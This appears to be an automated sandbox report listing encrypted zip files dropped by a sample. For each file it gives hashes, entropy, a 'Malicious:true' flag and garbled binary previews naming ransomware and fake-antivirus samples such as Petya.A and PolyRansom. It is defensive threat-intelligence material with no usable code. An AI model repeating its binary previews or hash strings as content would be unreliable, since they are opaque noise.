                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1721302
                                                                                                                                                    Entropy (8bit):7.999903232734228
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:49152:pe9rvkVDuuk8/JWXY/+XyxN7kHBRcuA7/:pedkVDuuk8/YIsy7AHE
                                                                                                                                                    MD5:974918541AA75F380AA6CB4D8BD3C4BD
                                                                                                                                                    SHA1:D0A6A3A301CF5330B00281EE8FF04ED9C3455FC7
                                                                                                                                                    SHA-256:D703FC0DE3F07684528BC1931479815A4B9CD7B66FEDBB753CA21314A6A300D6
                                                                                                                                                    SHA-512:DB829BBA3372A6E452D03D24E998EE91D28E3816C9D1A8D81330D450B24DC695E15D2612EC69729BEAFB28D95271BA55B6BE8B95DBE7F4B15F4F65BF5B5279B5
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK.........43L....C..........Endermanch@HappyAntivirus.exe.+...)hK..H.; N.:N...HU.2.....|........xbpeu....4...st.,O"...2...$.W..1V..a...>.\f.#p.\...$...<m..Z..:.a..z...Bp.b.B.P..pOZ%r.......J..&){.n..E....s.+C.X.._......c.fj..x+..p.X..U.:./!]}..t.b;..i.x6.bs....Z....@.0..k.v.&N.J.rlS....I.ig5.Ph.~......!O....y6..Kt....<..gR.V^.{...#.k|WTc..5.I.>..u.a.+..uo.!......b.o.%.<!f`:....^9U.5..e.&..aY..z.x../u..a.p..>`.jo,)..t3.)L..i..v....C:.....3..M.&Q0|H...}.b$..&....LP....n....q...\ez....}....B.=.>x(...q..kX.....=.;Sg.t..3.....be../k.w..<.q.i3..#\.:...i.j6..d.........,H.G5C%..W.E...Lm.|.....'...".{.7.z.X..m...m.2].Y.......8F...d..R..Il. .U..}.....P..!....1H:.,%=3.H..?..fD.K.....F.5.+T.c...g..N*1g...}1......,4.x..T...........K.3.....F.-..*..|.".[..Z:.%?....jy%....]..;o2zYY.p.1....>.8;......n.%|$.;px}..N.%...y.0.Z%.~.....f....@.3o|....nGE-..{2..@...$$..3[.....*.o.p.+....3.0[..../..v..(..%.@.......|...<X..........y_.f ......oKAN..F8..
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):34300
                                                                                                                                                    Entropy (8bit):7.994524271759185
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:768:xaTvxO0nJFcoYFY5Hn8tuWRHkD+unrGRcd0zOF9MzKh8yK4ZJy9ELob8a:EtOoJFSzt5BiGGmObB04Z09cobl
                                                                                                                                                    MD5:5569BFE4F06724DD750C2A4690B79BA0
                                                                                                                                                    SHA1:05414C7D5DACF43370AB451D28D4AC27BDCABF22
                                                                                                                                                    SHA-256:CFA4DAAB47E6EB546323D4C976261AEFBA3947B4CCE1A655DDE9D9D6D725B527
                                                                                                                                                    SHA-512:775BD600625DC5D293CFEBB208D7DC9B506B08DD0DA22124A7A69FB435756C2A309CBD3D813FC78543FD9BAE7E9B286A5BD83A956859C05F5656DAA96FCC2165
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK..........UMs2..>....L......Endermanch@InfinityCrypt.exe..Z9.o.KV.o.xug.]....Q~PY.QUkUH..:.TZ...E.(Y.N..n......)..#m....@....l.8.k..\.W,V8w...qU....N.|V.NtQ*.#2.YoP..S;.}|)..N.1.'?.....0e.aI.M..R..Zr..=}9.T+.....@]...Y..)!..z..b{......k5.C..WCU...no... |E.g.y....k.T......\'.O...7":s..D.m.L0....[I...`7.FA^.*.;...s..Nu.)...*7.E..L...U!..N.p...PG.C/...g...,...k.O8._...=...W.....%.-;.....,4s..ma...<+.h.0.....9A......&.].c..C`.?fQ.....g..R...>.....wF..0..x..vBIF;..m.s.E...d.R._=..i^dVV..Tq`...w.b......i...5..G.....|:|..k..l.....*..<..L.]...AV...t^,>T.nLW8W...pP.U..}..K.J]j....pc.2..d'...6.t..~...s74.K0M{.......ninG.lf|S.y3.t_.."9...kjG)..(.P...s\.......x%;....-d;...S.Y,.......-.... .1.D.S.....Q.<..2.6,.t......2..F..!.a.V......-=...t..S./....~..K.<..]f.ND...........U.t>.8[{.?...F..f...AQM`.+....K.m_JN...n...d@...G...w..k.......EY..?0./<......!...m<.<..@.42.....).)+..+...[HM..-Z~.X<......U............0w#...r...&.}.../3.t|z.........rmq}G..P...o.
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2580873
                                                                                                                                                    Entropy (8bit):7.999939102869259
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:49152:TYlQo7QjNMZJRM4KEInWDwuK9fhCvLtoLCd:COjN6M4nU9p2toud
                                                                                                                                                    MD5:C5AFBB8DA79525BA74AA0FDC5BB5D17A
                                                                                                                                                    SHA1:19A7BB8F31F40592C350555EB450924193AA5AEF
                                                                                                                                                    SHA-256:5F3C2E1AD778441373CBFDC5D07884376175A9409E260E60EDD292A95F9BC4CA
                                                                                                                                                    SHA-512:36CD962AE3C4C0BEC993A1C379130FFBD5EF475E234E4CCFEBD51F4E52FF6861BC3C1EE6AB20DF4E8A1B04F4BA7F2F9437C9BCFBAD9573CFFC74A4680DDEC589
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK..3...c...@.....`'..@b.$...Endermanch@InternetSecurityGuard.exe......AE...^...]|S-..O....A#.#...U....%.....!....X.4.m..Y.M.".A....u.l*5zq....z...Q]...n...c.Y.G..(..O.........S..gx.(,n.7.M....m..d.......iB..SF.00..s.67..'..e.Vi...?Fa..62..E}..(......g...............7....f........-M'..3.,.8....^.~.{....'!.7.y.....L..;i.fX..E.......u......Er+....-..BVU...3.2WED.._.....<o.S.E.1J....j*ud.;S>...C..f...p.).."B/xlx.Y.C..lM.."~./....0._.=s.R.5,._........k..PE&...7.>..c..J%l......I..H....NA..=}...P.9....xb.q..H?.....+.../G....G..0.5...H(Z u.roob..A.;.:9U...."z..........).v-..Dq.^..".Hk.w..F!.t....z.H.......C.].Q.r ..Z).aa..#.Z..Y.lE.6..a.M..V....F..(=T...g.`.......ae.h.....R%.Q..........t.&%.kF.7PK.I.Q..."'9.Qb..0..n.z....,y.Q.....!w3.2.......:P.......%........G.2^Mw&..U..iP..>.G..N.........W..S7.vQ.4.../.HG../..o9.$5".I...&h(.....qU..>....P.V..,.7..c..u..?../.7+4.]e.'...#a.II..lM.2.<...lm....~.....C'.D.Qur;y>..<V....~... .n.r9.P....+3h....w..nM....
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):26359
                                                                                                                                                    Entropy (8bit):7.99208020012939
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:768:gGkaFGuW/1rmxspfsYEOgDGjvZIxvTAd7i6BoBTYpk1:xhQBoSgDGDZQ0dhyj1
                                                                                                                                                    MD5:1AEA5AD85DF3B14E216CC0200C708673
                                                                                                                                                    SHA1:E3EE16E93BA7C3D7286DC9EBBAF940F0BCB6CAD3
                                                                                                                                                    SHA-256:8DFA496C93680ADC10E77C0946C7927D3E58D79900013C95DFCA3411D766BD16
                                                                                                                                                    SHA-512:06FAA190350E4558C6D4F1F201DC0698587495897593AAEAC16F3EA3D8C1C7F81D65BEEA6BC7E730CA1DF9BDFDF3CD2BCC84BF50F64787E0B1DBD21492796F36
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK..3...c...8..../f..).......Endermanch@Krotten.exe......AE...Q....>,.....}./A......r.=..@Nz....RGCZ.....{..H*.8..i..N.."W.+...@.;E..f....".l.t.f..rj..M@...V.Z../.i^Z.D...JX...J.m.5$F.Q...J..x.rF.....H#,:..t'..7...JKQJ.=..u\..M,.d.(<....,).dJ...~.Sg.......2...>...&Q}b.IJ.%`?6.~f..*......c.....a.f3...q......l....G..1`U...\..........e.Aw.R}W-s8.(.^..|.L..6.Q..N.2'.~..g..o.vQ......q.okL.4|*.#>"..G.0fN...L..b.*...pB...T%.BP],.B.RsRCa.....v..O.y...7V.......]4..q.n..{...........w-.}.oWT.v..c@......{.$....M^wC...Z..*o.p.].z...-xKd...{....P.T4/....n...B.+.JNn.LB.Z.`9E9".#g...v.'%..H7.f...l.I]e<q..C.D..x.G....=...zG.S.Q.+....iRS:..F.....S.8.A. .tH...Z-..x..U).......k...<...;^1..6..}AK.#......HI..@.X4.h|9V.^aZ.#.....B..P.|...gk...n...\-.....3..:P....Y.....^.....j..Ty..|{.%=Xt.;..Md..A....B}.0.K.T.....(.t..N..o...aU.`...HC. .)....<%.=%.....`....9j.<.Z..3k.^_i....!..s.3'.UP....3.Kc.].=.......c..-..k#K[.....{;...Oj...#Y..(.+k...D.F,..R.Ly.@.t.m...C..
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1034690
                                                                                                                                                    Entropy (8bit):7.9997993383764445
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:24576:GZTNiabEMrMDc3Hf80xcwCz+cjMhnY7zMCSbkDOBa3aizyvlZ1jJnap:G1Ni8EMIcXdewOXMcMfa3p4z15ap
                                                                                                                                                    MD5:7A5994FAB80A2ED6ADF59A93C7BC2D88
                                                                                                                                                    SHA1:FE2DDCEFD45C378DFB19817DE118FCF151C59B1F
                                                                                                                                                    SHA-256:6EBAD2EA4D537EB1CE11DD19D495FCA3E2B8B4E50140D9B241B71F5F1BC71804
                                                                                                                                                    SHA-512:5BA499F12ED0A5DE31350530402327DC323AAE7D414EE972BD652265E5226ADEF71D94C0B52A3BF0EBE8F95081C3C27708758EF15DA58163492AFDB664E08AD2
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK.........c.N.4[.............Endermanch@LPS2019.exe..b.J ...M........k.L.*..(. ..S.x.*X0.....>...'k...o.t.C.2.........i....).s+..2.t/..f.e...)...&..E..Z..y..b.&...c.....v...>..d`{.....V...2.......T/.7....gi.L....5...B>.5.....!.8Q...KT.L..HB.......P?.....=...YH*T....*.~f...W..?.@).jR..'e/7F_.S.$c.O...F...#.e.Q...(.)...*.D&w..y......p......qh..|.F.6.O... R...O....l....ycc..4.y...+p(.s.......wq.VC....7. .I.A.-....U.-..@.a7k.j.......Q<.+..^.fij...#.3m/.......}...5..k$/&.]b?. ...E.......7.h.Q!)..D.VID:q..E.c....0.../....U.._..<=.Q..|.]wq^.......g.o...Y..\.[..e....o.N....;.?..?.......zR`.q6...g(.t ..9..(..;.L......... j~0e...K.qr[O..."...43....8~t....i..*....q.+<...."q.......f...X$..m..<x.....y...%...V...A......d..}........8;s....x=U+....\..Y..|.t.x..#.CA..m..t.../8........q...VV*BW...M.:>F.,..RR......\|.....PTC.&....I....g_..go.F_:...x.E....N.%..=..%.T..A........2..h.........l>...\.A...).cT....f"[Y...0..7C.W..(......lN..!..~k.X%-...)..-.;.0.-..+.^{f0
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):384539
                                                                                                                                                    Entropy (8bit):7.9994843619449485
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:6144:zk0gUeiDOm+YiE8ZtuKsFcxWSmycwbZFa3fPPG7ye3B95/HqXTVF5Ca0s4V:w0gUeKCZjsjSlXVF2e7y2rvqDPEaP4
                                                                                                                                                    MD5:711743BFCFFBC075F3DF90412D33B1F4
                                                                                                                                                    SHA1:5A8157AEA7D2B424F07673597BE661A44517E653
                                                                                                                                                    SHA-256:0C5BB6B0098682F3CC63B95BD2F218D6186BD8F4E322B3A048107F20602AFB2B
                                                                                                                                                    SHA-512:969E3699B5CCBF70C19C251E487B843160F8A24F284B85A6AC96E917114F0BF45EAC8F3BFF8837A66C4FDCBF6F71AE4E11E81317F7F89E03B5DC468CE2FEFFF2
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK..3...c..L@....M....z......Endermanch@Movie.mpeg.exe......AE........b...../.....JXU....G.]8..Y..:...;..].d.*......w..cd..69E.H;..`L...,..B......&X.......s.K.T.......C_&..c.%.0._`..a..#....`..7:.Vm.k&6..|$.Q2SCah\r._...^L.$8r.:.r.!......g.l].....6.....,...M..my...~.#iF...6.d/..*.\..4(+ia...VSI>..........x..G.Y5..../..HR.......+.........."$....:.O.R..>.s......]~..T.g$.. ....,4..9..JQ.~.$..c.F.L......H....i.1....V.i.g...z.#.]..b.....@.f.....4OiI..B.O.....\....k../.Tz....M".d..U...jQ(....-.A.jA..s..4.......A`.L...r.\..7..V>......F.y.y....D..d...H[9.S..'.4C.#.gB..WP...U.)..f.$h...6@[.5j...84m.Fc4....><&..O}S.W....IB.o..b.^+W;V.l.x..S....g....a..Z.w..m .@)...-.&.w......mg=^.c.1.%<n.CU.......aN..r$. 7...._....0...D[Mr.9.}............+DB...t.9(@.>f......m.kO......e.|.f.W......:.9?zL.Rb....,...bU.)Q.R....(%..."..3)3....N...M.0.m....sPPt$...`...E.......E.B.....:.....R.........1_qar..y..?..(..A>.....%.......;..fW.V.E.2.+.r.s.?.r.W...@.I.
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):9761692
                                                                                                                                                    Entropy (8bit):7.999976737620723
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:196608:RIqrrCcUdFJp1YNYbsVNCpsF98DOV9Qz7FFEClC6j2LzfFXkoZc1kXa:FCcUdFX5gNL8oQz7FFECl3j2ffF0L1Ua
                                                                                                                                                    MD5:B05E1B131299F3D57323BDCA54B00570
                                                                                                                                                    SHA1:82EBEB46687E7B285F588C056E52CCAAB87E464D
                                                                                                                                                    SHA-256:3ADB8147E461A11ADD25101D78205B61B54B6993022C8014B9A55B3197CA39C9
                                                                                                                                                    SHA-512:35580E1580CC2DC5A50AFDB1E3453517FA3955F7737C177A83BF2BBB9D000A7A5F060B032200E0440C4478400AC8B1788E018FC7C88ED150B96282146E2F2457
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK........F..H..............Endermanch@NavaShield.exe.m.."Q;~&.,.....y...[...W<....n&S28$.L2...c..k.Z.:._ .}..l....O....R(..Q:L....re..o...S...q........1.......Q........%.e..g0....n..H{.o.A...~.(.tV#..v..}Sz......e...a.AS. ..x......EX%BT...)......D.|>A....Je.Q`[+.g.;.o.Kw.k.......V....ObC9.v*`....E..-.GwX7..6...j.*gd...@S..E;.O......k..o...m.C&.[..H.s.}%@...........dGG..<.-.<rGTo.....-...L}....W...:.gq......w.9..U..<....'..8NY.?...R.H.AN8j....e.].....c.j...g....ZWk.0.ny.6...n...B..j.^.g..4..6..R.<0[.bN...$..`..d.R.9.l.).f.K.0.d.Y..R..../.F..y.:.A.%...FaC.{...n...w..BZws.................%<.p......'@.Tavg.1...<.(.cFE.I..:.5..._.j'O..%.5q...../<$z.~...|inI....f.~^.<(..D.;x...&.r..)O...\....!..E...`C.s..-?.../..w.d.|7....,.<p.|.f.....s.T....-...{.H`....6.eE..d.WR&..p.".....K.fKG.m.a...........TV[..`..a......6.jl.3D!W..M.[..d<..k.y.... .i.|8.v"..Ka......'.@...%...d...M".....9......l/=.6..I...pv.a..f...\..F.-z.B...*bJK.W.i.H...) .4.P@...G...*..p..jRk.y.
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):938498
                                                                                                                                                    Entropy (8bit):7.999770835729866
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:24576:+FhIdZxByAl+XiqNk6n3DaeCTLD1yilc7KrBVw1lFVFDqE/zQRsAOfySS:AhAgo2ikhryLD1hcerklFVhqEMiAuySS
                                                                                                                                                    MD5:F315E49D46914E3989A160BBCFC5DE85
                                                                                                                                                    SHA1:99654BFEAAD090D95DEEF3A2E9D5D021D2DC5F63
                                                                                                                                                    SHA-256:5CBB6442C47708558DA29588E0D8EF0B34C4716BE4A47E7C715EA844FBCF60D7
                                                                                                                                                    SHA-512:224747B15D0713AFCB2641F8F3AA1687516D42E045D456B3ED096A42757A6C10C6626672366C9B632349CF6FFE41011724E6F4B684837DE9B719D0F351DFD22E
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK...........J.i..FQ..........Endermanch@NoMoreRansom.exe.&P....\..J..vt.D('..i...!.}..V./.d..i...^..j...V.......dk?..o#....}.6.F.......IZ+.~.H.l.o.....z...r..TJ.^.1.7..b&B.@.C.....)...34]...~...m..Y...}...P.r...>.z.....".4T.>.........\..?..E...z....G...u..4...;"..;8.|.....*...Z.k.4....G.V..x.Si.%...K..Q.6.......+Y.?...m......{,l...Xe....C/W..$...j.,(....4a .1.'..f...3lG8.{..z........H]..N8.H...%g.....V.`.y..f..Y...Q.l....=*....p....x.o.".M%...L.fc......Z..".C.`.oU.......e.......S.G.n....L.j@..Y....^......E$..l.$...&......4...h...x.9U....d..9..-i.zt7.>....hJz...=.......p..1AEd....O..y....m..6.[.8 3..u..q[.i.K..d.a...H4*.]....#[.....=.....y.Y9......K_L4.7.....Y.@..}.T../.B.G.&`.......s.,.iQ.P}..O'~..5e...L..~......x'M..l.<.x.s}|....Jq.........Sv%.M.Q.!?....L....^24<..eP]..*.crf.&.....J.o..;.w(..5]..>.Wc x...R......J.X.>.XTU....".....p...[..v.E...V....~.....<...K........Lfm`..3M?....G.....J5.d..~...a.#...1......i.@6..?.c+.....?r'K..0.~...L.s.[
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):808324
                                                                                                                                                    Entropy (8bit):7.999786964776398
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:24576:btiUqYRf3p96/VG8K8LtegdCDUcbdbbUJ9rV:btipYF3JategwDU029rV
                                                                                                                                                    MD5:CAD618323B07C0F4F6273AE08DF1779E
                                                                                                                                                    SHA1:E67715F81F83CE7CDA32F12A116CC950B6FD0DAC
                                                                                                                                                    SHA-256:854113F2737EE276BA34FAC399E8A615E4DE4C712DD7A761AB0E198FA09D87FC
                                                                                                                                                    SHA-512:EFD9403706ACCFE996B5DF58300B5E0A0B461727BDF7C5492E9914369FEF09AE06CDC2D00D30AC6D494FC68DADCF423D800741F7C22D5C1D565EF3FC675C4565
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK..........'=..h].T...r......Endermanch@PCDefenderv2.msiq...AQ..).&...6..!....FH...v.....o...M:......G.d>o'.W.i..d.....u.\....{.A......C..j..7..S:...P..'..+'. .5...I.W.[...m_O....=1*..Z..Sa..A.....K.4.......k[G..y..how..n....D.xN......Lr3U2.G..k6).=.3.0.{...i....u.{..........JOwA....RYib.CM.%..R.K^.P.$i{NO..C@X...t..Y'}.<.....q. .n.....*x0..)..*..u.l|.T."..j.E%.ffarZ...v...W!..Pp....~'.B...No.Z."..l?..g..'..rZtB....L..L......@.N..'t..81:...'......m.N..;...);....Y.{nV......g|P..}..g../.9.va?iM]"..a..'+.j.D.?u.}..8..3....v....F.;..'..-G.t(.W..uC...4.....Q0..d../.....j,$.V.....8v....pbR..G..w.....{..'...\[-.....-..Q.Y.U\.+.W.G.........<ce.O.b$M...&..d..z...8.-..o.r..Q...., .C.e.k...b..`$)]w-.l]....h.......U.....2..+...........@..D9..U....,..I.0.......b.|.}..@..bP\H3.z.....4<.{.].F....:BR ur..>....B{..K.,0v..p.....i.9........%+.M;$...H.........y..rvq.2.Sj...I.....W...Z8..0wU.z...0.Mb=.r....U=....)..0..f.]J...`_..I1.}...`....#p.h.8hs.8...n\..
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):857943
                                                                                                                                                    Entropy (8bit):7.9998266762101435
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:24576:8PihE4O3RN9DzQwHCP1cxm6JmZ/T/Jybru:sihc3RrDzJCP1ISZ/FKy
                                                                                                                                                    MD5:C2C0E8A4B2790140EA1AAE223669C48F
                                                                                                                                                    SHA1:664A18B5DB524FAD9E43DF2B9C3C0577562082A7
                                                                                                                                                    SHA-256:B23ECCB36868753A1131A9A6B88B33324B3CDD7E232FB80CB5DF4E2994F5A9E6
                                                                                                                                                    SHA-512:DF22757F866564887154C54A053F919F03A27CED1446B95979B02B8960EC499167F6E9C3A1F76E8359AD044C8A5ED2C6ADDC4874A712F75726A24D3029A8587E
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK.........nv<.e..............Endermanch@PCDefender.exe.?.....r...o......4...I...0.]...u9...\.....sN.DK@../...a~[.%.@..n....}..7......t...;..0=....|.t.......l....8..!.W.....#.q*B...{..S.,.y.......,...2v..A%x..<..{.nQ....S>.B........$.b(H9.H...BI.u...b.r[k.4..0..Y.......'.I..B.<.-p.E./j.%LE.0a......Q.M.g.{.F.k-.O..F.[...(B.yx^......f]'.jg.R.O..G...5A.&/.{XC...B+?..E.r..=.rX.n 7...y.]n1.2..;2....l..q..;....iR.0Z..0|.j..<w*.k.S...:..(E..3...3..3..ua.y&.kJ.9;P...Q..K..|..l?.c5E.+qm.I."..'*.<.i...d.0B....c.Y.e@.Z.......B.`^.....t...;.S..(...(....un...su..BSg...O...+P.pf..=j0q.Y...5..i.UY.Q..V......A..v..F.#F.I*./.....Mbn...J..?x..R.d`.:........OQ....9..}.'v.L..>..0..+...b.e.1..w....i..S.l.....((C..%R.f...r..h.0 .]..=i~N..jw...I.....z.=..u.tlnW...<./......1O"n..2|.zE.F.C...Ah.8'..|.h..^.F.h.H...h..?.1.....t.D=xEo.6.580>..Z2..j.w.......D...o#bh..(.....#.S........n.@^m.#../.p.~d..c.J..=.<Et....n...%........XeO.Z}...]%.K.........8xk`.CmIV.
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):131293
                                                                                                                                                    Entropy (8bit):7.998685171989688
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:3072:7P2YmowJWNmYv5lnTc8R+igbpBgBXtzXW4Dg/PJLDEuUYBAald:r2YnzNmYBlI8hgdBgBXpXxDg/PJLDEH4
                                                                                                                                                    MD5:1559522C34054E5144FE68EE98C29E61
                                                                                                                                                    SHA1:FF80EEB6BCF4498C9FF38C252BE2726E65C10C34
                                                                                                                                                    SHA-256:E99651AA5C5DCF9128ADC8DA685F1295B959F640A173098D07018B030D529509
                                                                                                                                                    SHA-512:6DAB1F391AB1BEA12B799FCFB56D70CFBDBDE05AD350B53FCB782418495FAD1C275FE1A40F9EDD238473C3D532B4D87948BDDD140E5912F14AFF4293BE6E4B4C
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK.........t.I.w.H+...........Endermanch@Petya.A.exe.i?mj.P.........N.d|....>.c.....%..N.....I....7{.F.O...2.wT:..g...dg...{._:....`.....L...jR.0.d,...5..!....*u6...N.n8..R..{.d...|.{.........[.....y.f..!.f.A.........nl...}...@.....X....6.....7...o...(:\....D.N5.h.Y...78&...U....EA......A.5l...[......_6'..F$...[.~qut...X>1n..4.S...~.[._|/..n...#....j5......N...Y{WwD..%s.Vo....T7Wn.jIRq].*!..Ky...la.-^.}..j.s^^s..._.....r.E.........9E%NK?..%.....IGf.y.....<Ok.E._(.sW.G..O.%.)`.Iam..b.j.l.g..~.W....|...c.L.....k0...a...`.q.sls...........1.p.....^....TRq}..0?...:..VU...#a..+.1f...9(....0.+\}.j..~.0.#.De..mk.$......X..1.......p....q&.._.<.j..e..6/,..D.G....c..v......47..jd...q.....eb.z.........x.W.h.M...M.8.x;....<$StHq....k..AP7...k...........X.5m..O.%S.Y....?m.6.J.#...7s..=.4.*....p^g.A..y......3P;.=C.mc.id.n$..D..np..f......_nQ.W.J..+.a.....s.l...;@.2.,B-|W..,.......U.r..n..WB...2..@SE=..A...V.& F.wy6.q....O$...z=6..*.....+nD#....i.C|f.-...~^?...
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):133759
                                                                                                                                                    Entropy (8bit):7.9985193464243505
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:3072:veAhzA234eL3kq97n2PxqzYwiYjeKPdwekrkb:veEhJ1keyKPz
                                                                                                                                                    MD5:7A5AB2552C085F01A4D3C5F9D7718B99
                                                                                                                                                    SHA1:E148CA4CCE695C19585B7815936F8E05BE22EB77
                                                                                                                                                    SHA-256:ED8D4BB55444595FABB8172EE24FA2707AB401324F6F4D6B30A3CF04A51212D4
                                                                                                                                                    SHA-512:33A0FE5830E669D9FAFBC6DBE1C8D1BD13730552FBA5798530EEB652BB37DCBC614555187E2CFD055F3520E5265FC4B1409DE88DCCD4BA9FE1E12D3C793EF632
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK..........yE4C.......p......Endermanch@PolyRansom.exeX.......%Q.......C.....]V.\.....#.X...z..K.'.uK..7..Gd%._u.G5..0..).Nz.h.....%._..TE....)..H....X.b.(.%]]D..."..0.|5..).G.-h'q.:...}b.1...:.^..d.d.t...9...iY+.....f...!.fn.sk..UG(......b..Rn_`....l....7W!...P.n{.....F...`C.'.....N...i.a..kD*V.XH......2....#...t.p.=..v.ykKDF..>..d.....4=.<.1..k.a...W..V:....m.1..g...U....l.s......../...3a.*.....TRG..N... ..Bm3.!.k.m.!..RIrjR;.^.n.....#.sW..lP4..!F...MR1..W.....u...@ ....#..[J{..U.....a6.fL.......HU...v-..<.HU ...jy.;..=........<._3..GP .%..(....K...s..%.....s.. .....Vb.N,.<.... v.(WM...j6.5.N..m....XzTm...$......[W..%!WY_......QAp..Y...#.3G.....b5...>......&.2.....&.QS.w.D.`...PF[.!.. ...h....-...`..?N........z...%.|..nD,VdW*d7....XC.(l.....+..0Z`................Ug..(..4.4...s.Zh.m._I!.f.6.|...-..aB..~iid"o. ...c..N.)..y....x..H....#|5.N...N..r..h..-c...>&v..d~e..9.A..(...2.6.?...;....D....-..w..~V..........U......$..[.(o*..........T.
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1070715
                                                                                                                                                    Entropy (8bit):7.999811036564782
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:24576:8Ssy3ly84sw+6ZL/8Hexx58oBiNkNHaIW:8Svy/D8Hexx0Nk9K
                                                                                                                                                    MD5:7958E5251E5E6F9C3B7752FF1543E28A
                                                                                                                                                    SHA1:86F6A8439CE6A6B30E6347C5BDE7E091E5FAD0AC
                                                                                                                                                    SHA-256:B31C3F9D08337314050552A7DFDCEAF42BB6D22BAEE287CDE6238A6D965D87CD
                                                                                                                                                    SHA-512:AEC50B136792AEBBD5AA8E5D316C39B728FF28E411DD54DB99A18D5C7B9447F25629C4220800EE8DD8CD2B24A98A11D46F32B45A62BDA5135C2FF0A731E032EE
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
